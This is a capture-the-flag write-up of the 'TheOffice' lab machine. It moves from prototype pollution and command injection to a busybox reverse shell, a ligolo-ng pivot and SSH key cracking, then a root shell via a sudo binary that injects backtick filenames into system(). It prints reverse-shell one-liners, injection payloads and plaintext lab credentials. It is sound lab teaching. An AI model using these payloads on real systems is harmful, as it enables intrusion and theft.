TheHackersLabs - TheOffice Machine Detailed Writeup (WP)
Author: 城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.148 08:00:27:7a:26:98 (Unknown)
192.168.60.254 00:50:56:e0:55:bd (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.945 seconds (131.62 hosts/sec). 4 responded
export ip=192.168.60.148
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.148:22
Open 192.168.60.148:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 20:26 CST
Initiating ARP Ping Scan at 20:26
Scanning 192.168.60.148 [1 port]
Completed ARP Ping Scan at 20:26, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:26
Completed Parallel DNS resolution of 1 host. at 20:26, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:26
Scanning 192.168.60.148 [2 ports]
Discovered open port 22/tcp on 192.168.60.148
Discovered open port 80/tcp on 192.168.60.148
Completed SYN Stealth Scan at 20:26, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.148
Host is up, received arp-response (0.00053s latency).
Scanned at 2025-01-08 20:26:36 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 63
MAC Address: 08:00:27:7A:26:98 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visiting the site, there is nothing clickable.

image

Directory brute-forcing

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login (Status: 200) [Size: 4713]
/admin (Status: 401) [Size: 9]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

There is an /admin endpoint, and the page hints that we can log in as guest.

image

Prototype Pollution

curl, however, shows a comment hidden in the page source.

It looks like JSON data; I handed it to GPT to explain.

❯ curl $ip
…… omitted ……
<!--
credentials = ['{"username":"admin", "password": "' + crypto.randomBytes(64).toString("hex") + '", "cookie": "' + crypto.randomBytes(64).toString("hex") + '", "isAdmin":true}',
'{"username":"guest", "password":"guest", "cookie": "' + crypto.randomBytes(64).toString("hex") + '"}'];
-->%

This snippet builds an array of two users. The first is an administrator (admin) whose password and cookie are randomly generated; the second is a guest whose password is the fixed value guest and whose cookie is also random. crypto.randomBytes(64).toString("hex") produces strong random bytes and is commonly used for cryptographic and security purposes.

The point for us: the guest record has no isAdmin property at all, so any server-side check that reads user.isAdmin falls through to Object.prototype. With JavaScript prototype pollution we can set isAdmin to true on that prototype, and guest then passes the check.

For background on prototype pollution, see this article:

深入理解 JavaScript Prototype 污染攻击 (An in-depth look at JavaScript prototype pollution attacks) | 离别歌

image

If you log in as guest and try to run a command, the app replies "you are not admin".

image

So let's intercept the request on this page and set isAdmin to true ourselves.

In the captured request, clear the Cookie and change the Content-Type to JSON.

The request goes through. The response still says unauthorized, which is fine: the pollution lands on the server's Object.prototype and takes effect for subsequent requests, not for the one that delivered it.

image
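Why this request works, as an added example rather than the challenge's own code: the webapp's server source is not shown, so the merge function and the isAdmin check below are assumptions about how a Node app of this kind typically handles a JSON body. The vulnerable merge sits next to a hardened one that refuses the keys that reach the prototype chain.

```javascript
'use strict';
// Added example, not the challenge's code. Assumes the app merges the JSON
// request body into an object with a naive recursive merge (a common pattern)
// and decides admin status by reading user.isAdmin.

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// Vulnerable merge: follows any key, including "__proto__". JSON.parse turns
// {"__proto__": {...}} into an *own* property named __proto__, and
// target["__proto__"] resolves to Object.prototype, so the recursion writes
// isAdmin onto the prototype shared by every object in the process.
function unsafeMerge(target, source) {
  for (const key in source) {
    const val = source[key];
    if (isPlainObject(val) && isPlainObject(target[key])) {
      unsafeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Hardened merge: skips the three keys that reach the prototype chain and
// only descends into properties the target itself owns.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const val = source[key];
    if (isPlainObject(val)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) || !isPlainObject(target[key])) {
        target[key] = {};
      }
      safeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// The guest record in the page's comment has no isAdmin field, so a check
// like this falls through to Object.prototype once that is polluted.
function isAdmin(user) {
  return user.isAdmin === true;
}

// Feeds one attacker request through the chosen merge and reports whether an
// unrelated guest session now passes the admin check. Pollution is undone
// afterwards so the process is left clean.
function simulateRequest(mergeFn) {
  // Constructed attacker body: the JSON sent in place of the normal form.
  const body = JSON.parse('{"__proto__": {"isAdmin": true}}');
  const guest = { username: 'guest' }; // fresh object, no own isAdmin
  try {
    mergeFn({}, body); // the app's body handling
    return isAdmin(guest);
  } finally {
    delete Object.prototype.isAdmin; // remove pollution, if any
  }
}

console.log('unsafeMerge: guest passes isAdmin ->', simulateRequest(unsafeMerge)); // true
console.log('safeMerge:   guest passes isAdmin ->', simulateRequest(safeMerge));   // false
```

Note that the polluted property lives on Object.prototype, not on any session, which is why the request that delivers it can be answered with 401 and still flip the check for every later request.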

Going back and running the command again, the popup (translated) says "this process exists".

It behaves like a process checker, so I tried command injection.

image

To make the result visible, I tried pinging my own host and checking whether the packets arrive.

image

image

Nothing more to say; let's get a reverse shell.

Using nc directly didn't work, probably because nc isn't installed on the target.

We can use the nc built into busybox instead.

image

User Privilege Escalation

Listen on a port

❯ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.148] 33383
id
uid=1000(node) gid=1000(node) groups=1000(node)

This box has no bash, only sh, which is painful.

Quickly drop a public key in and connect via ssh... wait, why can't I connect with the private key?

Fine, this unstable shell is hard to use; I'll make do.

We can see there is an .ash_history.

Let's see what commands were typed; it looks like an agent was used to proxy a connection to some port.

More importantly, .ftp contains user credentials.

ls -al
total 36
drwxr-sr-x 1 node node 4096 Jan 12 11:31 .
drwxr-xr-x 1 root root 4096 May 2 2024 ..
-rw------- 1 node node 590 May 13 2024 .ash_history
-rw-r--r-- 1 node node 31 May 7 2024 .ftp
drwxr-sr-x 4 node node 4096 May 6 2024 .npm
drwx------ 2 node node 4096 Jan 12 11:33 .ssh
drwxr-sr-x 1 node node 4096 Jan 12 11:26 app
cat .ash_history
cd ..
ls
wget http://10.0.2.5/agent
chmod +x agent
cat .ftp
./agent -connect 10.0.2.5:11601 -ignore-cert
cd ..
cd app/
busybox nc 10.0.2.5 8888 sh
busybox nc 10.0.2.5 8888 -e sh
ls
export TERM=xter
reset
export TERM=xterm
reset
ip a
export TERM=xterm
reset
ls
cd ..
wget http://10.0.2.5/agent
ls
./agent -connect 10.0.2.5:11601 -ignore-cert
ls -la ~
cat .ftp
./agent -connect 10.0.2.5:11601 -ignore-cert
cd ..
cd /tmp
ls
busybox nc 10.0.2.5 8888 -e sh
ls
export TERM=xterm
reset
wget http://10.0.2.5/agent
chmod +x agent
./agent
./agent -h
file agent
ls
cd ..
ls
./agent
rm agent
ls
exit
cat .ftp
carlton:gQzq2tG7sFxTm5XadrNfHR

Ligolo Pivot

But port 21 wasn't open in the service scan earlier. Looking at the target's IP shows the system is inside Docker.

No wonder there are no tools, it's so bare.

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP
link/ether 02:42:ac:65:00:02 brd ff:ff:ff:ff:ff:ff
inet 172.101.0.2/28 brd 172.101.0.15 scope global eth0
valid_lft forever preferred_lft forever

The agent tool already exists in the target's /tmp.

We can use the Ligolo-ng pivoting tool; first download it from GitHub.

Tunneling and Port Forwarding - HackTricks

nicocha30/ligolo-ng: An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.

❯ wget https://ghproxy.cc/https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
--2025-01-12 19:56:42-- https://ghproxy.cc/https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
Resolving ghproxy.cc (ghproxy.cc)... 172.67.134.196, 104.21.6.115, 2606:4700:3037::ac43:86c4, ...
Connecting to ghproxy.cc (ghproxy.cc)|172.67.134.196|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5029070 (4.8M) [application/octet-stream]
Saving to: ‘ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz’

ligolo-ng_proxy_0.7.5_linux_amd64.t 100%[================================================================>] 4.80M 11.4MB/s in 0.4s

2025-01-12 19:56:44 (11.4 MB/s) - ‘ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz’ saved [5029070/5029070]

After extracting, we get the proxy binary.

sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

Using the agent already on the target, it connects, but the ligolo-ng side never receives a session.

The docs explain it: agent and proxy versions must match.

Deleted the agent on the target and wget'd the same version as on Kali.

Since we are on >v0.6, the proxy can create the tun interface itself.

sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » interface_create --name "ligolo"
INFO[0020] Creating a new "ligolo" interface...
INFO[0020] Interface created!
----------- separator -------------
/tmp $ ./agent -connect 192.168.60.100:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established addr="192.168.60.100:11601"

The proxy now receives the session; start tunnel mode.

See the official docs for the details:

Quickstart · nicocha30/ligolo-ng Wiki

sudo ./proxy -selfcert
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
WARN[0000] Using self-signed certificates
WARN[0000] TLS Certificate fingerprint for ligolo is: 36C07692CB8DE46FF8EE2E7AE336EF247203DEBFCF7117298621D70583C93D3F
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/

Made in France ♥ by @Nicocha30!
Version: 0.7.5

ligolo-ng » INFO[0024] Agent joined. id=8496b142-e9bd-432d-8e24-8f9921bee2ce name=node@webserver remote="192.168.60.148:37340"
ligolo-ng » session
? Specify a session : [Use arrows to move, type to filter]
> 1 - node@webserver - 192.168.60.148:37340 - 8496b142-e9bd-432d-8e24-8f9921bee2ce
[Agent : node@webserver] » tunnel_start --tun ligolo
[Agent : node@webserver] » INFO[0353] Starting tunnel to node@webserver (8496b142-e9bd-432d-8e24-8f9921bee2ce)

Keep the proxy running and add a route for the container network.

sudo ip route add 172.101.0.0/28 dev ligolo
❯ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 5e:bb:f6:9e:ee:fa brd ff:ff:ff:ff:ff:ff
inet 192.168.60.100/24 brd 192.168.60.255 scope global eth0
valid_lft forever preferred_lft forever
5: ligolo: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 500
link/none

Now scan the whole 172.101.0.0/28 range.

❯ rustscan -a 172.101.0.0/28
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 172.101.0.3:21
Open 172.101.0.1:22
Open 172.101.0.4:22

Three hosts answered: .1, which is normally the Docker bridge gateway, i.e. the host itself (its port 22 is the same sshd we saw from outside), .3 with FTP on 21, and .4 with SSH on 22.

Obtaining the user's private key

Connect with the credentials found above and download the private key.

❯ ftp carlton@172.101.0.3
dir
Connected to 172.101.0.3.
220 Welcome to my FTP server.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||30916|)
150 Here comes the directory listing.
-rw-r--r-- 1 1000 1000 3434 May 06 2024 id_rsa
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||30652|)
150 Opening BINARY mode data connection for id_rsa (3434 bytes).
100% |************************************************************************************************| 3434 1.71 MiB/s 00:00 ETA
226 Transfer complete.
3434 bytes received in 00:00 (993.92 KiB/s)
ftp>

Private keys on this lab's machines are always passphrase-protected; crack it.

❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
lawrence (id_rsa)
1g 0:00:00:21 DONE (2025-01-12 20:40) 0.04750g/s 44.08p/s 44.08c/s 44.08C/s hawaii..lawrence
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We don't know which user it belongs to, so check the key's comment.

❯ ssh-keygen -c -f id_rsa
Enter passphrase:
Old comment: willsmith@server
New comment:

Try this username; which host to log in to is unknown. From the scan above, apart from .2 (the container we are in), only .1 and .4 have 22 open.

Tried both and neither worked; after reading other people's writeups I realised I had missed an IP. Note that .11 is inside 172.101.0.0/28, so rustscan simply missed it; over a tunnel, a slower scan (for example a plain connect scan with a lower rate) is worth repeating before concluding a host is down.

image

Connecting to SSH on .11 finally works.

At last, user.

❯ ssh willsmith@172.101.0.11 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux office 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed May 8 21:48:44 2024 from 172.101.0.2
willsmith@office:~$ ls -al
total 64
drwxr-xr-x 1 willsmith willsmith 4096 May 8 2024 .
drwxr-xr-x 1 root root 4096 May 6 2024 ..
-rw------- 1 willsmith willsmith 600 May 8 2024 .bash_history
-rw-r--r-- 1 willsmith willsmith 220 Apr 23 2023 .bash_logout
-rw-r--r-- 1 willsmith willsmith 3526 Apr 23 2023 .bashrc
-rw-r--r-- 1 willsmith willsmith 33 May 7 2024 .ftp
-rw-r--r-- 1 willsmith willsmith 807 Apr 23 2023 .profile
drwxr-xr-x 1 willsmith willsmith 4096 May 6 2024 .ssh
-rw-r--r-- 1 willsmith willsmith 131 May 8 2024 '`bash shell.sh`.7z'
-rw-r--r-- 1 willsmith willsmith 131 May 8 2024 '`whoami`.7z'
-rw-r--r-- 1 willsmith willsmith 51 May 8 2024 shell.sh
-rw-r--r-- 1 willsmith willsmith 131 May 8 2024 test.7z
-rw-r--r-- 1 willsmith willsmith 5 May 8 2024 test.txt
-rw-r--r-- 1 willsmith willsmith 39 May 7 2024 user.txt
willsmith@office:~$ cat user.txt
flag{61992ce8bc28cb06461c82d62584e718}

The history wasn't cleared; let's see what was done.

willsmith@office:~$ cat .bash_history
ls -la
cat user.txt
cat .ftp
sudo -l
echo 'test' > test.txt
7zz a test.7z test.txt
clear
cp test.7z '’whoami’'.7z
ls
rm *.7z
ls
7zz a test.7z test.txt
'`whoami`'
cp test.7z '`whoami`'.7z
ls
sudo /opt/uncompress /home/willsmith/'`whoami`'.7z
touch shell.sh
cp test.7z '`bash shell.sh`'.7z
nano shell.sh
vi shell.sh
echo '#!/bin/bash;bash -i >& /dev/tcp/10.0.2.5/9000 0>&1' > shell.sh
sudo /opt/uncompress /home/willsmith/'`bash shell.sh`'.7z
pwd
ls
rm shell.sh
wget http://10.0.2.5/shell.sh
curl http://10.0.2.5/shell.sh -o shell.sh
sudo /opt/uncompress /home/willsmith/'`bash shell.sh`'.7z

Root Privilege Escalation

Sudo permissions

Clearly a deliberately planted hole: sudo allows running uncompress to extract 7z files. But how do we escalate with it?

willsmith@office:~$ sudo -l
Matching Defaults entries for willsmith on office:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User willsmith may run the following commands on office:
(ALL) NOPASSWD: /opt/uncompress

Just when I thought it would be over quickly, the trail went cold.

Then I remembered the FTP on .3 hadn't been fully used, and host .11 also has a .ftp file.

willsmith@office:~$ cat .ftp
willsmith:2j9ptYyw3uKJHxLb6ZzRNh
----------- separator --------------------
❯ ftp willsmith@172.101.0.3
Connected to 172.101.0.3.
220 Welcome to my FTP server.
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||30948|)
150 Here comes the directory listing.
-rw-r--r-- 1 1001 1001 1156 May 06 2024 uncompress.c
226 Directory send OK.
ftp> get uncompress.c
local: uncompress.c remote: uncompress.c
229 Entering Extended Passive Mode (|||30453|)
150 Opening BINARY mode data connection for uncompress.c (1156 bytes).
100% |************************************************************************************************| 1156 1.32 MiB/s 00:00 ETA
226 Transfer complete.
1156 bytes received in 00:00 (806.93 KiB/s)
ftp>

We get the uncompress.c source file.

❯ cat uncompress.c
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>

/* Only the first six bytes of the file *contents* are checked. The file's
   *name* is never validated, and the name is what reaches the shell below.
   (The fread return value is also unchecked, so a file shorter than six
   bytes is compared against uninitialised memory.) */
bool is_valid_7z(const char *filename) {
    FILE *file = fopen(filename, "rb");
    if (!file) {
        perror("Error opening file");
        return false;
    }

    // Check if the first six bytes are "7z\xBC\xAF\x27\x1C" (7z file signature)
    unsigned char signature[6];
    fread(signature, sizeof(unsigned char), 6, file);

    if (signature[0] == '7' && signature[1] == 'z' && signature[2] == 0xBC &&
        signature[3] == 0xAF && signature[4] == 0x27 && signature[5] == 0x1C) {
        fclose(file);
        return true;
    }

    fclose(file);
    return false;
}

int main(int argc, char *argv[]) {
    if (argc != 2) {
        printf("Usage: %s <file>\n", argv[0]);
        return 1;
    }

    const char *filename = argv[1];
    if (is_valid_7z(filename)) {
        printf("%s is a valid 7z file.\n", filename);
        // Execute 7z x command
        // Vulnerable: the unquoted filename is spliced into a command line that
        // system() hands to /bin/sh. Because this binary runs under sudo, any
        // `...` or $(...) inside the name is executed as root before 7zz runs.
        char command[100];
        snprintf(command, sizeof(command), "7zz x %s", filename);
        system(command);
    } else {
        printf("%s is not a valid 7z file.\n", filename);
    }

    return 0;
}

I handed it to GPT to explain:

The program first checks whether the input file is a valid .7z by reading its magic bytes.

If it is, it extracts the file with the system command 7zz x.

If not, it tells the user the file is not a valid .7z.

The security-relevant detail is in main(): the filename from argv[1] is formatted unquoted into a 100-byte command string and passed to system(), which runs it through /bin/sh. The magic-byte check only inspects the file's contents, so a genuine 7z archive whose name contains a backtick or $( ) command substitution passes the check, and the shell executes that substitution as root before 7zz ever sees the path. The extraction itself then fails (7zz is given the substituted name, which doesn't exist), but the injected command has already run.

The home directory conveniently already has a `whoami`.7z archive, so test with it.

Sure enough, the output contains root: the substitution ran as root, and 7zz then went looking for root.7z.

willsmith@office:~$ sudo /opt/uncompress  '`whoami`.7z'
`whoami`.7z is a valid 7z file.

7-Zip (z) 22.01 (x64) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15
64-bit locale=C.UTF-8 Threads:1

Scanning the drive for archives:

ERROR: errno=2 : No such file or directory
root.7z



System ERROR:
errno=2 : No such file or directory

There is also a shell.sh in the home directory; edit it and try for a reverse shell.

willsmith@office:~$ sed -i 's/10.0.2.5\/8888/192.168.60.100\/1234/g' shell.sh
willsmith@office:~$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.60.100/1234 0>&1
willsmith@office:~$ sudo /opt/uncompress '`bash shell.sh`.7z'
`bash shell.sh`.7z is a valid 7z file.
----------------- separator ----------
❯ pwncat-cs -lp 1234
[21:45:15] Welcome to pwncat 🐈! __main__.py:164
[21:45:21] received connection from 192.168.60.148:49064 bind.py:84
[21:45:22] 192.168.60.148:49064: registered new host w/ db manager.py:957
(local) pwncat$

(remote) root@office:/home/willsmith# cd ~
(remote) root@office:/root# ls
office.thl
(remote) root@office:/root# cat office.thl
office:P4mDjcVfqrj7eEXBV7EX

Another set of credentials.

This time there's no need to log in to a container: ssh straight to the host machine. Remember the host itself exposes 80 and 22.

Each folder in the home directory holds the files for one docker build.

❯ ssh office@192.168.60.148
office@192.168.60.148's password:
Linux TheOffice 6.1.0-20-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.85-1 (2024-04-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 9 00:19:00 2024 from 10.0.2.5
office@TheOffice:~$ ls
app app.tgz ftp laptop server
office@TheOffice:~/laptop$ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
14a283a0ab1c ftpserver "vsftpd /etc/vsftpd/…" 8 months ago Up 24 minutes 21/tcp ftpserver
2cf2ce43c67c server "/usr/sbin/sshd -D" 8 months ago Up 48 minutes 22/tcp server
489413ef27e2 webapp "docker-entrypoint.s…" 8 months ago Up 48 minutes 0.0.0.0:80->80/tcp, :::80->80/tcp webserver
8f7850553ea6 laptop "/usr/sbin/sshd -D" 8 months ago Up 48 minutes 22/tcp laptop
office@TheOffice:~/ftp$ sudo -l
[sudo] contraseña para office:
Matching Defaults entries for office on TheOffice:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User office may run the following commands on TheOffice:
(ALL : ALL) ALL

Switch straight to root.

office@TheOffice:~/ftp$ sudo su
root@TheOffice:/home/office/ftp# cd ~
root@TheOffice:~# ls
root.txt
root@TheOffice:~# cat root.txt
flag{f73a64a82b4dbeaf43f308999c5b380f}

This machine feels like an internal network engagement, pivoting layer by layer, but it's done.

I hadn't expected the 7z tool to allow command execution through backticks in the filename.
